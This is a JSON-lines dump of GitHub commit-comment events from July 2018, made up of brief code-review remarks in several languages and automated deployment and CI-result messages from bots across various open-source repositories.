{"id":"7997596997","type":"CommitCommentEvent","actor":{"login":"Davidc2525"},"repo":{"name":"Davidc2525/SucreCloud"},"payload":{"comment":{"id":29785830,"position":282,"line":154,"path":"src/App/elements/download_manager/Download.js","commit_id":"63e552c268cf788e0afb322d8062432ff9a7d408","created_at":"2018-07-20T23:19:19Z","updated_at":"2018-07-20T23:19:19Z","author_association":"OWNER","body":"this.currentDls = [] \r\npara el proximo commit"}},"created_at":"2018-07-20T23:19:19Z"}
{"id":"7997597056","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29785831,"position":null,"line":null,"path":null,"commit_id":"2c5888566531b1392dd7094a9be6ff3191ca42dd","created_at":"2018-07-20T23:19:20Z","updated_at":"2018-07-20T23:19:20Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [popoverpar](https://popoverpar-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/support](https://popoverpar-static-docs.pantheonsite.io/docs/support)\n- [source/_partials/popover.twig](https://github.com/pantheon-systems/documentation/commit/2c5888566531b1392dd7094a9be6ff3191ca42dd/source/_partials/popover.twig)\n"}},"created_at":"2018-07-20T23:19:20Z"}
{"id":"7997604135","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29785836,"position":null,"line":null,"path":null,"commit_id":"1976b841c5234e98c46229a08513ad9b2a0c395f","created_at":"2018-07-20T23:22:24Z","updated_at":"2018-07-20T23:22:24Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [customcert](https://customcert-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/custom-certificates](https://customcert-static-docs.pantheonsite.io/docs/custom-certificates)\n"}},"created_at":"2018-07-20T23:22:24Z"}
{"id":"7997607105","type":"CommitCommentEvent","actor":{"login":"BillytheOrc"},"repo":{"name":"cmangos/tbc-db"},"payload":{"comment":{"id":29785845,"position":null,"line":null,"path":null,"commit_id":"81d09e93da3f2a7dab22282e6b4cb4b17a168a82","created_at":"2018-07-20T23:23:43Z","updated_at":"2018-07-20T23:23:43Z","author_association":"NONE","body":":thumbsup:\r\n"}},"created_at":"2018-07-20T23:23:43Z"}
{"id":"7997607294","type":"CommitCommentEvent","actor":{"login":"LuisFerGeronimo"},"repo":{"name":"LuisFerGeronimo/SGA-Android"},"payload":{"comment":{"id":29785846,"position":null,"line":null,"path":null,"commit_id":"6a82c1958b1db558a289e53e70fa433ebb177d9a","created_at":"2018-07-20T23:23:49Z","updated_at":"2018-07-20T23:23:49Z","author_association":"OWNER","body":"### Tipos de datos de la BD MySQL.\r\nSe revisaron todos los tipos de datos de cada atributo de la tabla. \r\n- Se reforzó la **consistencia** de los tipos de datos.\r\n- Se cambiaron las fechas de **date/time** a **bigint**\r\n- Se cambiaron en el Diagrama de la base de datos .jpg\r\n\r\n### Views\r\nSe hicieron Views nuevas:\r\n- Alumno_GrupoView \r\n- Grupo_a_CarreraView\r\n- Alumno_a_CarreraView \r\n- Alumno_a_ClaseView\r\n\r\n### Datos iniciales (INSERT INTO)\r\n- Se cambió la **fecha de nacimiento** inicial de **NULL** a **845874000** seg a todo los campos **fechaNacimiento**."}},"created_at":"2018-07-20T23:23:49Z"}
{"id":"7997607329","type":"CommitCommentEvent","actor":{"login":"maksimandrianov"},"repo":{"name":"mapsme/omim"},"payload":{"comment":{"id":29785847,"position":13,"line":13,"path":"geocoder/types.cpp","commit_id":"08f38bd4fba8623603ec406307d715993aab4eed","created_at":"2018-07-20T23:23:50Z","updated_at":"2018-07-20T23:23:50Z","author_association":"CONTRIBUTOR","body":"Зачем break, если есть return?"}},"created_at":"2018-07-20T23:23:50Z"}
{"id":"7997609500","type":"CommitCommentEvent","actor":{"login":"jorive"},"repo":{"name":"Microsoft/xunit-performance"},"payload":{"comment":{"id":29785850,"position":5,"line":11,"path":"tests/standalonesample/Program.cs","commit_id":"9dd0474a4508d4723d3e11e63dcca0f82fe66077","created_at":"2018-07-20T23:24:49Z","updated_at":"2018-07-20T23:24:49Z","author_association":"MEMBER","body":"I think this could just be private."}},"created_at":"2018-07-20T23:24:49Z"}
{"id":"7997610970","type":"CommitCommentEvent","actor":{"login":"Titansmasher"},"repo":{"name":"blargbot/bbtag"},"payload":{"comment":{"id":29785854,"position":4,"line":109,"path":"src/language.ts","commit_id":"e5ab5bea63426af23169cad8defd054e28d605e7","created_at":"2018-07-20T23:25:29Z","updated_at":"2018-07-20T23:25:29Z","author_association":"MEMBER","body":"Wasnt referenced ever, so I removed"}},"created_at":"2018-07-20T23:25:29Z"}
{"id":"7997611167","type":"CommitCommentEvent","actor":{"login":"jorive"},"repo":{"name":"Microsoft/xunit-performance"},"payload":{"comment":{"id":29785855,"position":4,"line":13,"path":"tests/standalonesample/standalonesample.csproj","commit_id":"9dd0474a4508d4723d3e11e63dcca0f82fe66077","created_at":"2018-07-20T23:25:35Z","updated_at":"2018-07-20T23:25:35Z","author_association":"MEMBER","body":"Standalone benchmark should use the live packages."}},"created_at":"2018-07-20T23:25:35Z"}
{"id":"7997611773","type":"CommitCommentEvent","actor":{"login":"Titansmasher"},"repo":{"name":"blargbot/bbtag"},"payload":{"comment":{"id":29785856,"position":4,"line":4,"path":"src/structures/subtag.conditions.ts","commit_id":"e5ab5bea63426af23169cad8defd054e28d605e7","created_at":"2018-07-20T23:25:53Z","updated_at":"2018-07-20T23:25:53Z","author_association":"MEMBER","body":"Figured seeing as this would always be provided to make it required"}},"created_at":"2018-07-20T23:25:53Z"}
{"id":"7997612906","type":"CommitCommentEvent","actor":{"login":"flourishnz"},"repo":{"name":"flourishnz/coop"},"payload":{"comment":{"id":29785857,"position":null,"line":null,"path":null,"commit_id":"3794920b106a4e92fc24e6e559d6bb31ef5b3e10","created_at":"2018-07-20T23:26:24Z","updated_at":"2018-07-20T23:26:24Z","author_association":"OWNER","body":"From Dry A not B\r\nMost changes good, just some changes to comments that might get lost if I'm not careful"}},"created_at":"2018-07-20T23:26:24Z"}
{"id":"7997613644","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29785858,"position":null,"line":null,"path":null,"commit_id":"9c3e77de04c011e296e4f7e16783f9017cdc3e44","created_at":"2018-07-20T23:26:45Z","updated_at":"2018-07-20T23:26:45Z","author_association":"COLLABORATOR","body":"<h3>comments</h3>\n\nPreview: <strong><a href='https://18712-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18712-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18712-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-20T23:26:45Z"}
{"id":"7997615116","type":"CommitCommentEvent","actor":{"login":"jorive"},"repo":{"name":"Microsoft/xunit-performance"},"payload":{"comment":{"id":29785860,"position":5,"line":7,"path":"src/xunit.performance.api/xunit.performance.api.csproj","commit_id":"51180218f215262cdc5181fde1b2f91ad8a8e2bf","created_at":"2018-07-20T23:27:25Z","updated_at":"2018-07-20T23:27:25Z","author_association":"MEMBER","body":"This project does not need to be a `netcoreapp`"}},"created_at":"2018-07-20T23:27:25Z"}
{"id":"7997619470","type":"CommitCommentEvent","actor":{"login":"flourishnz"},"repo":{"name":"flourishnz/coop"},"payload":{"comment":{"id":29785888,"position":11,"line":23,"path":"Reminders.gs","commit_id":"3794920b106a4e92fc24e6e559d6bb31ef5b3e10","created_at":"2018-07-20T23:29:34Z","updated_at":"2018-07-20T23:29:34Z","author_association":"OWNER","body":"Don't want this change"}},"created_at":"2018-07-20T23:29:34Z"}
{"id":"7997620552","type":"CommitCommentEvent","actor":{"login":"Titansmasher"},"repo":{"name":"blargbot/bbtag"},"payload":{"comment":{"id":29785895,"position":167,"line":167,"path":"src/structures/subtag.ts","commit_id":"e5ab5bea63426af23169cad8defd054e28d605e7","created_at":"2018-07-20T23:30:05Z","updated_at":"2018-07-20T23:30:05Z","author_association":"MEMBER","body":"Removed the nested loop to reduce the amount run per execution. This is all pre-computed inside `SubTag#setNamedArgs()` now"}},"created_at":"2018-07-20T23:30:05Z"}
{"id":"7997622582","type":"CommitCommentEvent","actor":{"login":"ViktorHofer"},"repo":{"name":"Microsoft/xunit-performance"},"payload":{"comment":{"id":29785903,"position":4,"line":13,"path":"tests/standalonesample/standalonesample.csproj","commit_id":"9dd0474a4508d4723d3e11e63dcca0f82fe66077","created_at":"2018-07-20T23:30:59Z","updated_at":"2018-07-20T23:30:59Z","author_association":"MEMBER","body":"what do you mean with live packages? these are the live built ones, right?"}},"created_at":"2018-07-20T23:30:59Z"}
{"id":"7997624311","type":"CommitCommentEvent","actor":{"login":"Titansmasher"},"repo":{"name":"blargbot/bbtag"},"payload":{"comment":{"id":29785909,"position":123,"line":131,"path":"src/structures/subtag.ts","commit_id":"e5ab5bea63426af23169cad8defd054e28d605e7","created_at":"2018-07-20T23:31:44Z","updated_at":"2018-07-20T23:31:44Z","author_association":"MEMBER","body":"I dont think we want errors to be thrown during execution, so I have replaced this with a BBError call instead"}},"created_at":"2018-07-20T23:31:44Z"}
{"id":"7997624501","type":"CommitCommentEvent","actor":{"login":"jorive"},"repo":{"name":"Microsoft/xunit-performance"},"payload":{"comment":{"id":29785910,"position":5,"line":7,"path":"src/xunit.performance.api/xunit.performance.api.csproj","commit_id":"51180218f215262cdc5181fde1b2f91ad8a8e2bf","created_at":"2018-07-20T23:31:48Z","updated_at":"2018-07-20T23:31:48Z","author_association":"MEMBER","body":"I thought `netstandard2.0` was enough."}},"created_at":"2018-07-20T23:31:48Z"}
{"id":"7997625172","type":"CommitCommentEvent","actor":{"login":"ubiyca5"},"repo":{"name":"ubiyca5/rubylesson"},"payload":{"comment":{"id":29785911,"position":23,"line":23,"path":"lesson_1/discriminant.rb","commit_id":"130359db57e1919110573c614e45f0ca6806d220","created_at":"2018-07-20T23:32:07Z","updated_at":"2018-07-20T23:32:07Z","author_association":"OWNER","body":"исправил"}},"created_at":"2018-07-20T23:32:07Z"}
{"id":"7997626246","type":"CommitCommentEvent","actor":{"login":"ViktorHofer"},"repo":{"name":"Microsoft/xunit-performance"},"payload":{"comment":{"id":29785914,"position":4,"line":13,"path":"tests/standalonesample/standalonesample.csproj","commit_id":"9dd0474a4508d4723d3e11e63dcca0f82fe66077","created_at":"2018-07-20T23:32:39Z","updated_at":"2018-07-20T23:32:39Z","author_association":"MEMBER","body":"ah ok, I now understand what you mean. but why do you prefer the live assets?"}},"created_at":"2018-07-20T23:32:39Z"}
{"id":"7997626541","type":"CommitCommentEvent","actor":{"login":"Titansmasher"},"repo":{"name":"blargbot/bbtag"},"payload":{"comment":{"id":29785918,"position":120,"line":172,"path":"src/structures/subtag.ts","commit_id":"e5ab5bea63426af23169cad8defd054e28d605e7","created_at":"2018-07-20T23:32:50Z","updated_at":"2018-07-20T23:32:50Z","author_association":"MEMBER","body":"Added check to strictly enforce only valid names"}},"created_at":"2018-07-20T23:32:50Z"}
{"id":"7997628606","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29785931,"position":null,"line":null,"path":null,"commit_id":"55a5ee04fded079fcd084de8fc6832cb131ce399","created_at":"2018-07-20T23:33:52Z","updated_at":"2018-07-20T23:33:52Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-891](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-891).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-891-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-20T23:33:52Z"}
{"id":"7997628993","type":"CommitCommentEvent","actor":{"login":"jorive"},"repo":{"name":"Microsoft/xunit-performance"},"payload":{"comment":{"id":29785932,"position":4,"line":13,"path":"tests/standalonesample/standalonesample.csproj","commit_id":"9dd0474a4508d4723d3e11e63dcca0f82fe66077","created_at":"2018-07-20T23:34:05Z","updated_at":"2018-07-20T23:34:05Z","author_association":"MEMBER","body":"This project was setup up more as a sample of a xUnit-Performance benchmark + harness"}},"created_at":"2018-07-20T23:34:05Z"}
{"id":"7997629376","type":"CommitCommentEvent","actor":{"login":"flourishnz"},"repo":{"name":"flourishnz/coop"},"payload":{"comment":{"id":29785937,"position":57,"line":77,"path":"DryReports.gs","commit_id":"3794920b106a4e92fc24e6e559d6bb31ef5b3e10","created_at":"2018-07-20T23:34:15Z","updated_at":"2018-07-20T23:34:15Z","author_association":"OWNER","body":"Nope"}},"created_at":"2018-07-20T23:34:15Z"}
{"id":"7997629979","type":"CommitCommentEvent","actor":{"login":"flourishnz"},"repo":{"name":"flourishnz/coop"},"payload":{"comment":{"id":29785941,"position":61,"line":80,"path":"DryReports.gs","commit_id":"3794920b106a4e92fc24e6e559d6bb31ef5b3e10","created_at":"2018-07-20T23:34:31Z","updated_at":"2018-07-20T23:34:31Z","author_association":"OWNER","body":"Nope"}},"created_at":"2018-07-20T23:34:31Z"}
{"id":"7997632859","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/spark-testing-base-feedstock"},"payload":{"comment":{"id":29785951,"position":null,"line":null,"path":null,"commit_id":"ffd4ace3b6f872844471e155c3badfd27c50aec3","created_at":"2018-07-20T23:35:54Z","updated_at":"2018-07-20T23:35:54Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @dbast was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T23:35:54Z"}
{"id":"7997633265","type":"CommitCommentEvent","actor":{"login":"CharliePoole"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":29785955,"position":9,"line":196,"path":"src/NUnitFramework/framework/Schemas/TestResult.xsd","commit_id":"28092fa19b0c0787cf7b65e565059f7bc11e52ed","created_at":"2018-07-20T23:36:07Z","updated_at":"2018-07-20T23:36:07Z","author_association":"MEMBER","body":"Restricting it to \"2\" casts an implementation detail in concrete."}},"created_at":"2018-07-20T23:36:07Z"}
{"id":"7997633358","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29785958,"position":null,"line":null,"path":null,"commit_id":"11c28487758c5f2dd7569eb84bf4ae430e7e21c0","created_at":"2018-07-20T23:36:09Z","updated_at":"2018-07-20T23:36:09Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [popoverpar](https://popoverpar-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/support](https://popoverpar-static-docs.pantheonsite.io/docs/support)\n- [source/_partials/popover.twig](https://github.com/pantheon-systems/documentation/commit/2c5888566531b1392dd7094a9be6ff3191ca42dd/source/_partials/popover.twig)\n"}},"created_at":"2018-07-20T23:36:09Z"}
{"id":"7997637085","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29785977,"position":null,"line":null,"path":null,"commit_id":"a2c22cb63eb1131ca4a170e7a4030adffa6a1296","created_at":"2018-07-20T23:37:56Z","updated_at":"2018-07-20T23:37:56Z","author_association":"NONE","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1694 of 1694 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a2c22cb63eb1131ca4a170e7a4030adffa6a1296-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a2c22cb63eb1131ca4a170e7a4030adffa6a1296-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a2c22cb63eb1131ca4a170e7a4030adffa6a1296-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.02%25-green.png)</a>\n"}},"created_at":"2018-07-20T23:37:56Z"}
{"id":"7997638658","type":"CommitCommentEvent","actor":{"login":"jnm2"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":29785984,"position":9,"line":196,"path":"src/NUnitFramework/framework/Schemas/TestResult.xsd","commit_id":"28092fa19b0c0787cf7b65e565059f7bc11e52ed","created_at":"2018-07-20T23:38:50Z","updated_at":"2018-07-20T23:38:50Z","author_association":"CONTRIBUTOR","body":"The spec appears to tell you that the `2` is expected by NUnit\r\n\r\n> For the test-run, it is hard-coded as \"2\".\r\n\r\nCan we remove this from the wiki?"}},"created_at":"2018-07-20T23:38:50Z"}
{"id":"7997640790","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29785997,"position":null,"line":null,"path":null,"commit_id":"ce7e464a7c495ccde5a7d4bb1d2053a4b266295d","created_at":"2018-07-20T23:39:56Z","updated_at":"2018-07-20T23:39:56Z","author_association":"COLLABORATOR","body":"<h3>bring back checked state for uncontrolled usage, add test</h3>\n\nPreview: <strong><a href='https://18719-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18719-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18719-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-20T23:39:56Z"}
{"id":"7997640938","type":"CommitCommentEvent","actor":{"login":"chapulina"},"repo":{"name":"ros-simulation/gazebo_ros_pkgs"},"payload":{"comment":{"id":29785998,"position":112,"line":93,"path":"gazebo_ros/test/test_plugins.cpp","commit_id":"d34452a733d3f88fb788f6bbc21289b2cb575a89","created_at":"2018-07-20T23:40:00Z","updated_at":"2018-07-20T23:40:00Z","author_association":"NONE","body":"You did indeed, AND fixed a warning, thanks!!"}},"created_at":"2018-07-20T23:40:00Z"}
{"id":"7997644933","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29786013,"position":null,"line":null,"path":null,"commit_id":"e87edb7b9321eea2219eced0842a3b6d7f8f7d24","created_at":"2018-07-20T23:42:01Z","updated_at":"2018-07-20T23:42:01Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-879](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-879).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-879-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-20T23:42:01Z"}
{"id":"7997648335","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29786022,"position":null,"line":null,"path":null,"commit_id":"1c5d62220f074a4b6fd54721d0eb6e63558c8d04","created_at":"2018-07-20T23:43:44Z","updated_at":"2018-07-20T23:43:44Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-892](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-892).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-892-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-20T23:43:44Z"}
{"id":"7997648396","type":"CommitCommentEvent","actor":{"login":"v-dobrev"},"repo":{"name":"CEED/libCEED"},"payload":{"comment":{"id":29786023,"position":9,"line":12,"path":".astylerc","commit_id":"a0cb4bfa24d67a987dcf6d4283f7807efb850fa4","created_at":"2018-07-20T23:43:46Z","updated_at":"2018-07-20T23:43:46Z","author_association":"MEMBER","body":"Were these additions to the style ever discussed and approved?"}},"created_at":"2018-07-20T23:43:46Z"}
{"id":"7997649131","type":"CommitCommentEvent","actor":{"login":"zazazabo"},"repo":{"name":"zazazabo/three"},"payload":{"comment":{"id":29786024,"position":null,"line":null,"path":null,"commit_id":"8d2107b639d3d00bc757e909fe4b6e6baa23f11b","created_at":"2018-07-20T23:44:09Z","updated_at":"2018-07-20T23:44:09Z","author_association":"OWNER","body":"abc"}},"created_at":"2018-07-20T23:44:09Z"}
{"id":"7997649363","type":"CommitCommentEvent","actor":{"login":"zazazabo"},"repo":{"name":"zazazabo/three"},"payload":{"comment":{"id":29786025,"position":null,"line":null,"path":null,"commit_id":"8d2107b639d3d00bc757e909fe4b6e6baa23f11b","created_at":"2018-07-20T23:44:16Z","updated_at":"2018-07-20T23:44:16Z","author_association":"OWNER","body":"ddd"}},"created_at":"2018-07-20T23:44:16Z"}
{"id":"7997650875","type":"CommitCommentEvent","actor":{"login":"G10h4ck"},"repo":{"name":"PhenomRetroShare/RetroShare"},"payload":{"comment":{"id":29786028,"position":2,"line":2,"path":".gitmodules","commit_id":"1bce9f37d974378d59056354cdd58f660174b295","created_at":"2018-07-20T23:45:00Z","updated_at":"2018-07-20T23:45:00Z","author_association":"NONE","body":"I think it is better to move this under `supportlibs/cmark` restbed and pegmarkdown are stored under supportlibs/ too (and I plan to move rapidjson there too) do you know if pegmarkdown is still needed or we can delete it?"}},"created_at":"2018-07-20T23:45:00Z"}
{"id":"7997654591","type":"CommitCommentEvent","actor":{"login":"hiliang-cmu"},"repo":{"name":"OpenChirp/website"},"payload":{"comment":{"id":29786042,"position":null,"line":null,"path":null,"commit_id":"4b1d34c6f7e45da1de958d885fcfddcf0c4b1a10","created_at":"2018-07-20T23:46:48Z","updated_at":"2018-07-20T23:46:48Z","author_association":"COLLABORATOR","body":"Orz"}},"created_at":"2018-07-20T23:46:48Z"}
{"id":"7997655710","type":"CommitCommentEvent","actor":{"login":"G10h4ck"},"repo":{"name":"PhenomRetroShare/RetroShare"},"payload":{"comment":{"id":29786044,"position":null,"line":null,"path":null,"commit_id":"1bce9f37d974378d59056354cdd58f660174b295","created_at":"2018-07-20T23:47:20Z","updated_at":"2018-07-20T23:47:20Z","author_association":"NONE","body":"Great initiative!\r\nRetroShare will be a happier platform once we have a good alternative to sending HTML around and possibly get rid of it some day :)\r\nThanks!"}},"created_at":"2018-07-20T23:47:20Z"}
{"id":"7997655856","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29786046,"position":null,"line":null,"path":null,"commit_id":"6cd6873cf7f4077a8cb37d27813c4526abe7b4c5","created_at":"2018-07-20T23:47:25Z","updated_at":"2018-07-20T23:47:25Z","author_association":"NONE","body":"kiva-non-quad-walls (nealkruis) - x86_64-MacOS-10.9-clang: Tests Failed (1385 of 2938 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 624\n\nregression Test Summary\n * Passed: 621\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6cd6873cf7f4077a8cb37d27813c4526abe7b4c5-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6cd6873cf7f4077a8cb37d27813c4526abe7b4c5-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-47.14%25-red.png)</a> \n"}},"created_at":"2018-07-20T23:47:25Z"}
{"id":"7997656287","type":"CommitCommentEvent","actor":{"login":"ubiyca5"},"repo":{"name":"ubiyca5/rubylesson"},"payload":{"comment":{"id":29786048,"position":30,"line":30,"path":"lesson_1/triangle_square.rb","commit_id":"130359db57e1919110573c614e45f0ca6806d220","created_at":"2018-07-20T23:47:37Z","updated_at":"2018-07-20T23:47:37Z","author_association":"OWNER","body":"1 и 2 - меняет текст сообщения и при ошибки StandardError в типе Float чтобы показал тоже самое сообщение\r\n1 - выведет Введите длину\r\n2 - выведет Введите высоту"}},"created_at":"2018-07-20T23:47:37Z"}
{"id":"7997660527","type":"CommitCommentEvent","actor":{"login":"jorive"},"repo":{"name":"Microsoft/xunit-performance"},"payload":{"comment":{"id":29786060,"position":3,"line":14,"path":"tests/standalonesample/standalonesample.csproj","commit_id":"ca1e3fc1be411da360daddba7e6f612d95ee1b65","created_at":"2018-07-20T23:50:01Z","updated_at":"2018-07-20T23:50:01Z","author_association":"MEMBER","body":"I believe you do not need to have a reference to other packages."}},"created_at":"2018-07-20T23:50:01Z"}
{"id":"7997662421","type":"CommitCommentEvent","actor":{"login":"Srichon"},"repo":{"name":"ShashwatHiregoudar/BankManagement"},"payload":{"comment":{"id":29786065,"position":8,"line":7,"path":"README.md","commit_id":"1a6c5076bf3c139d5a89f141c2c383cdc0b207bd","created_at":"2018-07-20T23:51:01Z","updated_at":"2018-07-20T23:51:01Z","author_association":"NONE","body":"transfer"}},"created_at":"2018-07-20T23:51:01Z"}
{"id":"7997662502","type":"CommitCommentEvent","actor":{"login":"jorive"},"repo":{"name":"Microsoft/xunit-performance"},"payload":{"comment":{"id":29786066,"position":8,"line":17,"path":"tests/standalonesample/standalonesample.csproj","commit_id":"01febab690e160fb3c0657b6de2856436ee46cb2","created_at":"2018-07-20T23:51:03Z","updated_at":"2018-07-20T23:51:03Z","author_association":"MEMBER","body":"Could move this forward to `build0019`"}},"created_at":"2018-07-20T23:51:03Z"}
{"id":"7997665396","type":"CommitCommentEvent","actor":{"login":"RussellSpitzer"},"repo":{"name":"datastax/SparkBuildExamples"},"payload":{"comment":{"id":29786074,"position":4,"line":65,"path":"README.md","commit_id":"7ef8d363ce7f51628dcf2993e3e9c5a9fb1cf63c","created_at":"2018-07-20T23:52:35Z","updated_at":"2018-07-20T23:52:35Z","author_association":"COLLABORATOR","body":"Reddit Dr r Dr in this week 44r dddtdd I am r in the same boat tye I am Dr "}},"created_at":"2018-07-20T23:52:35Z"}
{"id":"7997665921","type":"CommitCommentEvent","actor":{"login":"CharliePoole"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":29786076,"position":9,"line":196,"path":"src/NUnitFramework/framework/Schemas/TestResult.xsd","commit_id":"28092fa19b0c0787cf7b65e565059f7bc11e52ed","created_at":"2018-07-20T23:52:51Z","updated_at":"2018-07-20T23:52:51Z","author_association":"MEMBER","body":"The id has no particular meaning to NUnit - it's just a string."}},"created_at":"2018-07-20T23:52:51Z"}
{"id":"7997667843","type":"CommitCommentEvent","actor":{"login":"tzanio"},"repo":{"name":"CEED/libCEED"},"payload":{"comment":{"id":29786082,"position":9,"line":12,"path":".astylerc","commit_id":"a0cb4bfa24d67a987dcf6d4283f7807efb850fa4","created_at":"2018-07-20T23:53:57Z","updated_at":"2018-07-20T23:53:57Z","author_association":"MEMBER","body":"I personally don't like `--indent-preproc-cond`, but I'm fine with `--align-pointer=name`."}},"created_at":"2018-07-20T23:53:57Z"}
{"id":"7997669021","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29786087,"position":null,"line":null,"path":null,"commit_id":"d59e9353cf81fda6f5fa9c9983c33a9b5f1b972a","created_at":"2018-07-20T23:54:35Z","updated_at":"2018-07-20T23:54:35Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-894](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-894).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-894-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-20T23:54:35Z"}
{"id":"7997674975","type":"CommitCommentEvent","actor":{"login":"alexjurkiewicz"},"repo":{"name":"Hellmonk/hellcrawl"},"payload":{"comment":{"id":29786103,"position":null,"line":null,"path":null,"commit_id":"b20c1475b182756ae213985b5b4053b61b24b3b9","created_at":"2018-07-20T23:57:45Z","updated_at":"2018-07-20T23:57:45Z","author_association":"NONE","body":"😎"}},"created_at":"2018-07-20T23:57:45Z"}
{"id":"7992674518","type":"CommitCommentEvent","actor":{"login":"HKyuan"},"repo":{"name":"HKyuan/vghtc"},"payload":{"comment":{"id":29773436,"position":null,"line":null,"path":null,"commit_id":"92503a7d73b38f8db0b78a681a1f7b48a6f9e040","created_at":"2018-07-20T03:00:33Z","updated_at":"2018-07-20T03:00:33Z","author_association":"OWNER","body":"hk"}},"created_at":"2018-07-20T03:00:33Z"}
{"id":"7992676654","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"Rothera/bpm"},"payload":{"comment":{"id":29773445,"position":null,"line":null,"path":null,"commit_id":"5249d495772952306b7c5fc5928f7f21fe1e155f","created_at":"2018-07-20T03:01:22Z","updated_at":"2018-07-20T03:01:22Z","author_association":"CONTRIBUTOR","body":"😃 "}},"created_at":"2018-07-20T03:01:22Z"}
